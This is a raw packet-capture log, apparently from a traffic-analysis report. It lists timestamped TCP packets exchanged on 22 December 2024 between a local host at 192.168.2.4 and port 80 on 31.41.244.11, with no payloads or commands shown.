                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.992201090 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.992600918 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.992677927 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.992690086 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.992695093 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.992718935 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.992731094 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.992922068 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.992961884 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.993340015 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.993381023 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.993441105 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.993458033 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.993484974 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.993496895 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.993662119 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.993711948 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.994142056 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.994196892 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.994226933 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.994241953 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.994268894 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.994280100 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.994441032 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.994497061 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.994920015 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.994971991 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.995017052 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.995033979 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.995076895 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.995228052 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.995269060 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.995702028 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.995758057 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.995821953 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.995839119 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.995861053 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.995872974 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.996018887 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.996139050 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.996475935 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.996517897 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.996592045 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.996608019 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.996633053 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.996644974 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.996779919 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.996848106 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.005008936 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.005050898 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.005063057 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.005079985 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.005105019 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.005121946 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.005285978 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.005321026 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.005323887 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.005338907 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.005359888 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.005369902 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.005649090 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.005690098 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.005793095 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.005831957 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.005847931 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.005863905 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.005875111 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.005883932 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.005908012 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.005918980 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.006387949 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.006423950 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.006483078 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.006499052 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.006515026 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.006520987 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.006539106 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.006552935 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.006551981 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.006571054 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.006587982 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.006592035 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.006604910 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.006623983 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.007348061 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.007395029 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.007450104 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.007467031 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.007482052 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.007498980 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.007505894 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.007514954 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.007533073 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.007534981 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.007570982 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.007575035 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.007597923 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.007605076 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.008409023 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.008426905 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.008441925 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.008454084 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.008459091 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.008474112 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.008474112 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.008482933 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.008491993 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.008502007 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.008507967 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.008522034 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.008526087 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.008531094 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.008553028 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.008564949 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.009365082 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.009381056 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.009397030 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.009408951 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.009413958 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.009423018 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.009429932 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.009442091 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.009447098 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.009455919 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.009464025 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.009473085 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.009480953 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.009490013 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.009505987 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.009522915 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.010245085 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.010268927 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.010288000 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.010303974 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.030555010 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.030596972 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.030651093 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.030668020 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.030689955 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.030699015 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.030855894 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.030896902 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.031024933 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.031040907 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.031059980 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.031079054 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.031255007 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.031291962 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.179245949 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.179461002 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.179483891 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.179507017 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.179529905 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.179569960 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.179661036 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.179680109 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.179702997 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.179722071 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.179852962 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.179893970 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.180114985 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.180155039 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.180182934 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.180201054 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.180222034 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.180233002 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.180401087 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.180439949 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.180859089 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.180953026 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.180969954 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.180993080 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.181011915 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.181371927 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.181472063 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.181489944 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.181514025 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.181533098 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.181689978 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.182063103 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.182190895 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.182230949 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.182293892 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.182311058 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.182336092 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.182348013 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.182509899 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.182548046 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.182949066 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.182987928 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.183054924 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.183072090 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.183092117 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.183103085 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.183259964 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.183299065 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.183732986 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.183773041 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.183834076 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.183850050 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.183871031 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.183881998 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.184056997 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.184094906 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.184513092 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.184551001 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.184617996 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.184634924 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.184658051 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.184670925 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.184839964 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.184886932 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.185285091 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.185322046 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.185384989 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.185401917 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.185421944 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.185434103 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.185596943 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.185633898 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.186078072 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.186182022 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.186198950 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.186223984 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.186249971 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.186399937 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.186994076 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.187035084 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.187158108 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.187175035 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.187191963 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.187213898 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.187226057 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.187649012 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.187764883 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.187782049 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.187810898 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.187824965 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.187978029 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.188438892 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.188479900 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.188541889 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.188559055 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.188600063 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.188746929 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.188786983 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.189205885 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.189322948 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.189338923 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.189366102 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.189388990 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.189532995 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.189996004 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.190040112 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.190094948 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.190114021 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.190154076 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.190315008 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.190352917 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.190773964 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.190888882 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.190906048 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.190929890 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.190954924 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.191097975 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.191586018 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.191627979 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.191675901 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.191694021 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.191735983 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.191895962 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:53.191934109 CET4987280192.168.2.431.41.244.11
